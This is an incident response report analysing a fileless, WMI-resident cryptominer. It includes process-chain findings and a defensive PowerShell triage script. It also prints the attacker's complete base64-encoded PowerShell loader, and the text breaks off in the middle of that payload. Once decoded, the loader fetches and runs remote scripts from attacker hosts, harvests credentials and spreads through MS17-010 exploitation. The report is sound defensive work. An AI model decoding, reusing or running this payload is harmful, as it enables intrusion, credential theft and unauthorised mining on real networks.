Fileless Cryptomining Incident Response Report


I. Overview

1.1 Topology

Non-compliant or careless operations during maintenance, or simply inadequate protection, allowed a host to be taken over by a cryptomining program. The program stores its malicious components inside WMI, which gives it fileless mining and lateral movement on the intranet; it additionally downloads a DDoS component and uses a scheduled task to regenerate a version-check component every 20 minutes.

1.2 Summary

On 4 April 2019 the user reported an alert: an intranet host showed abnormally high CPU usage, and at the same time the network anomaly monitoring platform flagged the same host for actively connecting to a mining pool.

1.3 Analysis approach

For a miner to produce coin steadily over the long term, four properties are indispensable: the mining function itself, long-term execution (persistence), self-concealment and self-propagation. The analysis therefore follows the attacker's basic intent:

1. Check how the mining runs;

2. Check how it propagates;

3. Check how it stays resident;

4. Check how it got into the operating system.

Tracing each of these closes the loop on every stage of the attack chain.

II. Analysis and handling of the host's mining behaviour

2.1 Current state

CPU usage on the host was at 75%, with Powershell.exe the largest consumer, so it was examined first.

2.2 Parent/child process table

The process names, parent PIDs and PIDs obtained from wmic process were sorted into the following chain:

Caption          ParentProcessId   ProcessId
wininit.exe      348               388
services.exe     388               504
svchost.exe      504               624
WmiPrvSE.exe     624               5148
powershell.exe   5148              3964
powershell.exe   3964              3180

Note that powershell.exe is a child of WmiPrvSE.exe rather than of explorer.exe or of a service: it was launched through WMI, which is the first indication that the loader lives in the WMI repository. Each program's CommandLine is given in the sections that follow.
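The chain above was pieced together by hand from wmic output. The following PowerShell is an added example (not part of the original report) that does the same automatically: it rebuilds the ancestry of every powershell.exe from Win32_Process, flags those that descend from WmiPrvSE.exe, decodes an -EncodedCommand argument when one is present, and lists the process's established connections to the pool ports this payload checks for. The port list and the output layout are assumptions; run it as Administrator on the suspect host.

```powershell
# Added triage script (not the report's own code). Assumed pool/C2 ports: the ones the decoded
# loader itself tests for (80, 14444, 14433) plus the competitor ports it kills (3333, 5555, 7777).
$SuspectPorts = 80, 443, 3333, 5555, 7777, 14433, 14444

$procs = Get-CimInstance Win32_Process
$byPid = @{}
foreach ($p in $procs) { $byPid[[int]$p.ProcessId] = $p }

function Get-ParentChain {
    # Walk ParentProcessId upwards; the $seen set guards against PID reuse loops
    param([int]$ProcessId)
    $chain = New-Object System.Collections.Generic.List[string]
    $seen  = @{}
    $cur   = $byPid[$ProcessId]
    while ($cur -and -not $seen.ContainsKey([int]$cur.ProcessId)) {
        $seen[[int]$cur.ProcessId] = $true
        $chain.Add(("{0}({1})" -f $cur.Name, $cur.ProcessId))
        $cur = $byPid[[int]$cur.ParentProcessId]
    }
    # root first, e.g. wininit.exe(388) > services.exe(504) > ... > powershell.exe(3964)
    $chain.Reverse()
    return ($chain -join ' > ')
}

function ConvertFrom-EncodedCommand {
    # -E / -EC / -Enc / -EncodedCommand carries UTF-16LE text in base64
    param([string]$CommandLine)
    if ($CommandLine -match '(?i)\s-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }
    }
    return $null
}

$conns = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue

foreach ($p in ($procs | Where-Object { $_.Name -ieq 'powershell.exe' })) {
    $chain = Get-ParentChain -ProcessId $p.ProcessId
    # A powershell.exe with WmiPrvSE.exe as an ancestor was started through WMI
    # (permanent event consumer, remote Win32_Process.Create, wmiexec ...)
    $viaWmi = $chain -match 'WmiPrvSE\.exe'
    $pool   = $conns |
        Where-Object { $_.OwningProcess -eq $p.ProcessId -and $SuspectPorts -contains $_.RemotePort } |
        ForEach-Object { "{0}:{1}" -f $_.RemoteAddress, $_.RemotePort }
    [pscustomobject]@{
        PID          = $p.ProcessId
        SpawnedByWMI = $viaWmi
        Chain        = $chain
        PoolConns    = ($pool -join ', ')
        Decoded      = (ConvertFrom-EncodedCommand $p.CommandLine)
    }
}
```

On Windows 7 / Server 2008 R2, which lack Get-NetTCPConnection, replace that call with parsing of netstat -ano output (PID is the last column), as the payload itself does.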

2.3 wininit.exe

CommandLine: wininit.exe

Windows Start-Up Application. It launches services.exe (Service Control Manager), lsass.exe (Local Security Authority) and lsm.exe (Local Session Manager).

2.4 services.exe

CommandLine: C:\Windows\system32\services.exe

The Windows Service Control Manager.

2.5 svchost.exe

CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch

The DCOMLAUNCH service starts COM and DCOM servers in response to object-activation requests; the WMI provider host below is started through it.

2.6 WmiPrvSE.exe

CommandLine: C:\Windows\system32\wbem\wmiprvse.exe

wmiprvse.exe (WMI Provider Host) is part of Windows; it hosts the providers that carry out WMI operations on behalf of the WMI service (winmgmt). A process started through WMI, for instance by a permanent event consumer or a Win32_Process.Create call, shows up as a child of WmiPrvSE.exe, which is exactly what the table in 2.2 shows for the two powershell.exe processes.

2.7 powershell.exe (PID 3964)

CommandLine: powershell.exe -NoP -NonI -W Hidden -E <base64 below>

JABwAGkAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAaQBuAGYAbwByAG0AYQB0AGkAbwBuAC4AcABpAG4AZwANAAoAJABzAGUAPQBAACgAKAAnAHUAcABkAGEAdABlAC4ANwBoADQAdQBrAC4AYwBvAG0AJwApACwAKAAnAGkAbgBmAG8ALgA3AGgANAB1AGsALgBjAG8AbQAnACkALAAoACcAMQAxADEALgA5ADAALgAxADQANQAuADUAMgAnACkALAAoACcAMQA4ADUALgAyADMANAAuADIAMQA3AC4AMQAzADkAJwApACkADQAKACQAYQB2AGcAcwAgAD0AIABAACgAKQANAAoAJABuAGkAYwAgAD0AIAAnAHUAcABkAGEAdABlAC4ANwBoADQAdQBrAC4AYwBvAG0AJwANAAoAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAzADsAJABpACsAKwApAHsADQAKAAkAJABzAHUAbQAgAD0AIAAwAA0ACgAJACQAYwBvAHUAbgB0ACAAPQAgADAADQAKAAkAZgBvAHIAKAAkAGoAPQAxADsAJABqACAALQBsAGUAIAA0ADsAJABqACsAKwApAHsADQAKAAkACQAkAHQAbQBwACAAPQAgACgAJABwAGkAbgAuAHMAZQBuAGQAKAAkAHMAZQBbACQAaQBdACkAKQAuAFIAbwB1AG4AZAB0AHIAaQBwAFQAaQBtAGUADQAKAAkACQBpAGYAIAAoACQAdABtAHAAIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQAJACQAYwBvAHUAbgB0ACAAKwA9ACAAMQANAAoACQAJAH0ADQAKAAkACQAkAHMAdQBtACAAKwA9ACAAJAB0AG0AcAANAAoACQB9AA0ACgAJAGkAZgAgACgAJABjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQAkAGEAdgBnAHMAIAArAD0AIAAkAHMAdQBtAC8AJABjAG8AdQBuAHQADQAKAAkAfQBlAGwAcwBlAHsADQAKAAkACQAJACQAYQB2AGcAcwAgACsAPQAgADAADQAKAAkAfQANAAoACQBpAGYAIAAoACQAaQAgAC0AZQBxACAAMAApAHsADQAKAAkACQBpAGYAIAAoACgAJABhAHYAZwBzAFsAMABdACAALQBsAGUAIAAzADAAMAApACAALQBhAG4AZAAgACgAJABhAHYAZwBzAFsAMABdACAALQBuAGUAIAAwACkAKQB7AA0ACgAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMABdAA0ACgAJAAkACQBiAHIAZQBhAGsADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAGkAIAAtAGUAcQAgADEAKQB7AA0ACgAJAAkAaQBmACAAKAAkAGEAdgBnAHMAWwAxAF0AIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQBpAGYAIAAoACgAJABhAHYAZwBzAFsAMABdACAALQBsAGUAIAAkAGEAdgBnAHMAWwAxAF0AKQAgAC0AYQBuAGQAIAAoACQAYQB2AGcAcwBbADAAXQAgAC0AbgBlACAAMAApACkAewANAAoACQAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMABdAA0ACgAJAAkACQAJAGIAcgBlAGEAawANAAoACQAJAAkAfQBlAGwAcwBlAHsADQAKAAkACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADEAXQANAAoACQAJAAkACQBiAHIAZQBhAGsADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAGkAIAAtAGUAcQAgADIAKQB7AA0ACgAJAAkAaQBmACAAKAAoACQA
YQB2AGcAcwBbADIAXQAgAC0AbABlACAAMwAwADAAKQAgAC0AYQBuAGQAIAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbgBlACAAMAApACkAewANAAoACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADIAXQANAAoACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkAfQANAAoACQB9AA0ACgAJAGkAZgAgACgAJABpACAALQBlAHEAIAAzACkAewANAAoACQAJAGkAZgAgACgAJABhAHYAZwBzAFsAMwBdACAALQBuAGUAIAAwACkAewANAAoACQAJAAkAaQBmACAAKAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbABlACAAJABhAHYAZwBzAFsAMwBdACkAIAAtAGEAbgBkACAAKAAkAGEAdgBnAHMAWwAyAF0AIAAtAG4AZQAgADAAKQApAHsADQAKAAkACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADIAXQANAAoACQAJAAkACQBiAHIAZQBhAGsADQAKAAkACQAJAH0AZQBsAHMAZQB7AA0ACgAJAAkACQAJACQAbgBpAGMAIAA9ACAAJABzAGUAWwAzAF0ADQAKAAkACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkACQB9AA0ACgAJAAkAfQANAAoACQB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACgAJwA6ACcAKwAnADQANAAzACcAKQANAAoAJAB2AGUAcgA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAkAG4AaQBjAC8AdgBlAHIALgB0AHgAdAAiACkALgBUAHIAaQBtACgAKQANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewANAAoAIAAgACAAIAAkAHYAZQByAF8AdABtAHAAPQAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwB2AGUAcgAnAF0ALgBWAGEAbAB1AGUADQAKACAAIAAgACAAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJAB2AGUAcgBfAHQAbQBwACkAewANAAoAIAAgACAAIAAgACAAIAAgAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvACQAbgBpAGMALwBhAG4AdABpAHYAaQByAHUAcwAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuAA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKACQAcwB0AGkAbQBlAD0AWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQADQAKACQAZgB1AG4AcwAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQANAAoAJABkAGUAZgB1AG4APQBbAFMAeQBzAHQAZQBtAC4AVABlAHgA
dAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAdQBuAHMAKQApAA0ACgBpAGUAeAAgACQAZABlAGYAdQBuAA0ACgANAAoARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAF8AXwBGAGkAbAB0AGUAcgBUAG8AQwBvAG4AcwB1AG0AZQByAEIAaQBuAGQAaQBuAGcAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBmAGkAbAB0AGUAcgAgAC0AbgBvAHQAbQBhAHQAYwBoACAAJwBXAGkAbgBkAG8AdwBzACAARQB2AGUAbgB0AHMAJwB9ACAAfABSAGUAbQBvAHYAZQAtAFcAbQBpAE8AYgBqAGUAYwB0AA0ACgANAAoADQAKAFsAYQByAHIAYQB5AF0AJABwAHMAaQBkAHMAPQAgAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAB8AHMAbwByAHQAIABjAHAAdQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBpAGQAfQANAAoAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAANAAoAJABlAHgAaQBzAHQAPQAkAEYAYQBsAHMAZQANAAoAaQBmACAAKAAkAHAAcwBpAGQAcwAgAC0AbgBlACAAJABuAHUAbABsACAAKQANAAoAewANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AZQBxACAAJABuAHUAbABsACkADQAKACAAIAAgACAAIAAgACAAIAB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoACQAcABzAGkAZABzACAALQBjAG8AbgB0AGEAaQBuAHMAIAAkAGwAaQBuAGUAWwAtADEAXQApACAALQBhAG4AZAAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIARQBTAFQAQQBCAEwASQBTAEgARQBEACIAKQAgAC0AYQBuAGQAIAAoACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA4ADAAIAAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAxADQANAA0ADQAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0A
DQAKAFIAdQBuAEQARABPAFMAIAAiAGMAbwBoAGUAcgBuAGUAYwBlAC4AZQB4AGUAIgANAAoASwBpAGwAbABCAG8AdAAoACcAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADUANQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADcANwA3ADcAIgApACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7AA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AbwBuACcAXQAuAFYAYQBsAHUAZQA7AGAAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGYAdQBuAHMAJwBdAC4AVgBhAGwAdQBlACAAOwBpAGUAeAAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIA
dABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAYAAkAGYAdQBuAHMAKQApACkAOwBJAG4AdgBvAGsAZQAtAEMAbwBtAG0AYQBuAGQAIAAgAC0AUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAAYAAkAFIAZQBtAG8AdABlAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABAACgAYAAkAG0AbwBuACwAIABgACQAbQBvAG4ALAAgACcAVgBvAGkAZAAnACwAIAAwACwAIAAnACcALAAgACcAJwApAGAAIgAiAA0ACgAgACAAIAAgACQAdgBiAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsAA0ACgAgACAAIAAgACQAdgBiAHMALgByAHUAbgAoACQAYwBtAGQAbQBvAG4ALAAwACkADQAKAH0ADQAKAA0ACgAkAE4AVABMAE0APQAkAEYAYQBsAHMAZQANAAoAJABtAGkAbQBpACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AaQBtAGkAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKAGkAZgAgACgAKAAkAGEAIAAtAFMAcABsAGkAdAAgACIAIAAiACkAWwAyAF0ALgBsAGUAbgBnAHQAaAAgAC0AbgBlACAAMwAyACkADQAKAHsADQAKACAAIAAgACAAKAAkAGEAIAAtAFMAcABsAGkAdAAgACIAIAAiACkAWwAyAF0AIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABhAHMAYwBpAGkAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAYQAyADUAaABZADIAdABsAGMAbQBWAGsALgB0AHgAdAAiAA0ACgB9AA0ACgANAAoAJABOAGUAdAB3AG8AcgBrAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ARABOAFMAXQA6ADoARwBlAHQASABvAHMAdABCAHkATgBhAG0AZQAoACQAbgB1AGwAbAApAC4AQQBkAGQAcgBlAHMAcwBMAGkAcwB0AA0ACgAkAGkAcABzAHUAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQBwAHMAdQAnAF0ALgBWAGEAbAB1AGUADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQAxADcAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAHMAYwBiAGEAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkA
cgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAHMAYwAnAF0ALgBWAGEAbAB1AGUADQAKAFsAYgB5AHQAZQBbAF0AXQAkAHMAYwA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHMAYwBiAGEAKQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABOAGUAdAB3AG8AcgBrACAAaQBuACAAJABOAGUAdAB3AG8AcgBrAHMAKQANAAoAewANAAoADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAUABBAGQAZAByAGUAcwBzAFQAbwBTAHQAcgBpAG4AZwANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACQAUwB1AGIAbgBlAHQATQBhAHMAawAgACAAPQAgACcAMgA1ADUALgAyADUANQAuADIANQA1AC4AMAAnAA0ACgAgACAAIAAgACQAaQBwAHMAXwBjAD0ARwBlAHQALQBuAGUAdAB3AG8AcgBrAHIAYQBuAGcAZQAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsADQAKACAAIAAgACAAJABpAHAAcwBfAGIAPQBHAGUAdAAtAEkAcABJAG4AQgAgACQASQBQAEEAZABkAHIAZQBzAHMADQAKACAAIAAgACAAJABpAHAAcwA9ACQAaQBwAHMAXwBjACsAJABpAHAAcwBfAGIADQAKAAkAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAANAAoACQBmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACEAKAAkAGwAaQBuAGUAIAAtAGkAcwAgAFsAYQByAHIAYQB5AF0AKQApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKAAkACQBpAGYAIAAoACQAbABpAG4AZQAuAGMAbwB1AG4AdAAgAC0AbABlACAANAApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKAAkACQAkAGkAPQAkAGwAaQBuAGUAWwAtADMAXQAuAHMAcABsAGkAdAAoACcAOgAnACkAWwAwAF0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACAAKAAkAGwAaQBuAGUAWwAtADIAXQAgAC0AZQBxACAAJwBFAFMAVABBAEIATABJAFMASABFAEQAJwApACAALQBhAG4AZAAgACAAKAAkAGkAIAAtAG4AZQAgACcAMQAyADcALgAwAC4AMAAuADEAJwApACAALQBhAG4AZAAgACgAJABpAHAAcwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBwAHMAKwA9ACQAaQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQA
XQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJABpAHAAIABpAG4AIAAkAGkAcABzACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAAtACQAcwB0AGkAbQBlACkALwAxADAAMAAwACAALQBnAHQAIAA1ADQAMAAwACkAewBiAHIAZQBhAGsAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABpAHAAIAAtAGUAcQAgACQASQBQAEEAZABkAHIAZQBzAHMAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkACQAJAGkAZgAgACgAKABUAGUAcwB0AC0AUABvAHIAdAAgACQAaQBwACkAIAAtAG4AZQAgACQAZgBhAGwAcwBlACAALQBhAG4AZAAgACQAaQBwAHMAdQAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQANAAoACQAJAAkACQBpAGYAIAAoACQAdgB1AGwAIAAtAGEAbgBkACAAJABpADEANwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAcgBlAHMAPQBlAGIANwAgACQAa